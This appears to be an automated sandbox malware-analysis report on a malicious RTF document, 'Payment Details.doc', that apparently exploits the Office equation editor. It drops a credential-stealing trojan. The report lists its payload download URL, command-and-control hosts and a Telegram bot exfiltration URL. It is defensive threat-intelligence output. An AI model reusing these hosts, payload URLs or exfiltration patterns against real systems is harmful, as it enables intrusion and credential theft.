                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		Security Account Manager1
                Security Software Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate                		NTDS1
                Query Registry                		Distributed Component Object Model1
                Email Collection                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Process Discovery                		SSH1
                Input Capture                		24
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry                		Proc Filesystem1
                Remote System Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow1
                System Network Configuration Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519253 Sample: Payment Details.doc Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 48 Initial sample is an obfuscated RTF file 2->48 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 26 other signatures 2->54 8 WINWORD.EXE 291 18 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 38 66.63.187.123, 49163, 80 ASN-QUADRANET-GLOBALUS United States 10->38 28 C:\Users\user\...\ncfplgpeter20306.exe, PE32 10->28 dropped 30 C:\Users\user\AppData\...\HgCppsoKmxQq[1].exe, PE32 10->30 dropped 66 Office equation editor establishes network connection 10->66 68 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->68 17 ncfplgpeter20306.exe 3 10->17         started        file6 signatures7 process8 signatures9 40 Antivirus detection for dropped file 17->40 42 Multi AV Scanner detection for dropped file 17->42 44 Machine Learning detection for dropped file 17->44 46 2 other signatures 17->46 20 ncfplgpeter20306.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        26 ncfplgpeter20306.exe 17->26         started        process10 dnsIp11 32 reallyfreegeoip.org 20->32 34 api.telegram.org 20->34 36 9 other IPs or domains 20->36 56 Installs new ROOT certificates 20->56 58 Tries to steal Mail credentials (via file / registry access) 20->58 60 Tries to harvest and steal browser information (history, passwords, etc) 20->60 signatures12 62 Tries to detect the country of the analysis system (by using the IP) 32->62 64 Uses the Telegram API (likely for C&C communication) 34->64

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Payment Details.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                Payment Details.doc100%AviraHEUR/Rtf.Malformed

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe100%AviraHEUR/AGEN.1308792
                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe100%AviraHEUR/AGEN.1308792
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe29%ReversingLabsWin32.Trojan.CrypterX
                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe29%ReversingLabsWin32.Trojan.CrypterX

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://varders.kozow.com:80810%URL Reputationsafe
                http://aborters.duckdns.org:8081100%URL Reputationmalware
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://anotherarmy.dns.army:8081100%URL Reputationmalware
                http://checkip.dyndns.org/q0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                https://api.telegram.org0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
                http://66.63.187.123/txt/HgCppsoKmxQq.exeqqC:0%Avira URL Cloudsafe
                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                http://66.63.187.123/txt/HgCppsoKmxQq.exej0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
                https://www.google.com/sorry/index0%Avira URL Cloudsafe
                https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
                https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                http://66.63.187.123/txt/HgCppsoKmxQq.exe0%Avira URL Cloudsafe
                http://66.63.187.123/txt/HgCppsoKmxQq.exeflC:0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20a0%Avira URL Cloudsafe
                http://reallyfreegeoip.org0%Avira URL Cloudsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
                http://checkip.dyndns.com0%Avira URL Cloudsafe
                https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                https://www.google.com/sorry/indextest0%Avira URL Cloudsafe
                http://api.telegram.org0%Avira URL Cloudsafe
                https://www.google.com/search?q=net0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		188.114.97.3
                		truetrue
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/8.46.123.33false
                        • Avira URL Cloud: safe
                        		unknown
                        http://66.63.187.123/txt/HgCppsoKmxQq.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.orgncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.org/botncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&incfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net03ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://66.63.187.123/txt/HgCppsoKmxQq.exeqqC:EQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.orgncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025B4000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002512000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/8.46.123.334ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://varders.kozow.com:8081ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/favicon.iconcfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://aborters.duckdns.org:8081ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://66.63.187.123/txt/HgCppsoKmxQq.exejEQNEDT32.EXE, 00000002.00000002.383161486.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/sorry/indexncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003651000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003686000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035D2000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/search?q=wmfncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://anotherarmy.dns.army:8081ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://66.63.187.123/txt/HgCppsoKmxQq.exeflC:EQNEDT32.EXE, 00000002.00000003.383078527.00000000002D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.383201670.00000000002D5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.org/qncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20ancfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://reallyfreegeoip.orgncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000253A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://reallyfreegeoip.orgncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26ancfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/search?q=netncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/sorry/indextestncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000363C000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000365E000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035E2000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003696000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.comncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025B4000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://api.telegram.orgncfplgpeter20306.exe, 00000009.00000002.907194224.000000000261E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net0Dncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namencfplgpeter20306.exe, 00000005.00000002.393368543.0000000002187000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://secure.comodo.com/CPS0ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.entrust.net/2048ca.crl0ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
